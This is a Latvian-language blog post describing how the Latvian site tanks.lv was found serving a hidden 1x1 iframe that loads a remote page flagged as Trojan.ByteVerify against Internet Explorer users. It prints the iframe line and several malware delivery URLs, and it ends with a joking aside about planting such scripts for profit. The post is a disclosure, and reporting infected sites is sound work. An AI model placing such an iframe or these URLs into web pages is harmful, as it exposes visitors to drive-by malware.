Trojas zirgi no vietējiem

Sēžu, saproties, bradāju pa tīklu, klausos mūziku, šūpoju kājas un kratu galvu mūzikas ritmā – un nekas – viss kedā. Uznāks miegs un iešu gulēt. Rīt atkal bradāšu, tā it kā nekas nebūtu noticis, lai gan varētu būt arī savādāk. Tā kā tas bija pirms gadiem diviem trijiem, kad blandījos apkārt ar ēzelīti. Kompis vājš, antivīrusi visu bremzē, lāpīties negribās, griezt nost ActiveX un JavaScriptus arī negribās, jo daudzās lapās viss izskatās slikti – mocības ne dzīve.

Labi, ķersimies pie lietas. Par dažādiem bīstamiem un ļoti bīstamiem caurumiem, kas varētu vienā vai otrā gadījumā sabojāt mūsu pārlūku vai sistēmas reģistrus, esam lasījuši diezgan daudz. Tā kā mani tas neskar, jo es Internet Explorer nelietoju interneta pastaigām, tad nu es par tām lietām arī nerakstu, jo reāli jau pieriebies. Galu galā garlaicīgi. Šoreiz būs kaut kas no šīs pašas sērijas tikai jau iz dzīves.

ievz iemeta jauku adresīti www.tanks.lv un piekodināja, lai to nevērtu vaļā ar Internet Explorer. Tā kā šo pārlūku savām interneta pastaigām neizmantoju, tad droši devos iekšā šajā lapā ar Ugunslapsu, bet neko pārdabisku nepamanīju. Ievērtējot lapas izejas kodu pamanīju lūk šo jauko rindiņu, kas atradās lapas apakšā.

<IFRAME SRC=”http://www.TryToImproveSecurity.com/fa/?h=KjHUk&d=get” WIDTH=1 HEIGHT=1></IFRAME>

Ja nu pēkšņi oriģinālajā lapā notiek nelielas pārmaiņas, tad te var ievērtēt arī saglabāto kopiju. ievz teica, ka viņam antivīrus nobļāvās par Trojan.ByteVerify esamību tajā lapā.

Ievērtējot lapas izejas kodu palika jautri. Galvenais jau, ka lietotājam nekas nav jādara, jo visu izdara viņa vietā. Var ievērtēt pāris adresītes. Es, protams, tās nedaudz pielaboju, lai jautrāk.
http://www.trytoimprovesecurity.com/fa/?h=jauks.pods.lv&d=get
http://213.159.117.133/dl/fox.php?tiirs.pods.lv
http://x.full-tgp.net/?pods.lv

It kā jau mums ir jautri, bet bērni, kas to vietu apmeklē, nemaz nenojauš kādā rotaļu kastē viņi spēlējās.

Godīgi sakot biju pārsteigts par šādām lietām. Varbūt vienkārši esmu aizmirsis kā tas bija agrāk? Nezinu. Katrā gadījumā labprāt uzzinātu par līdzīgu .lv zonas lapu esamību ar šādiem vai līdzīgiem trojas zirgiem. Varbūt kāds var pastāstīt kāda jēga ir no šādas drazas. Tā kā man lapā joprojām no visiem apmeklētājiem ir ap 50% IE lietotāju, tad varbūt varu vēl paspēt uzvārities? Sabāzīšu šādus līkos skriptus un nauda nāks griezdamies. 🙂

Ieraksti komentāru

Tava e-pasta adrese netiks publicēta.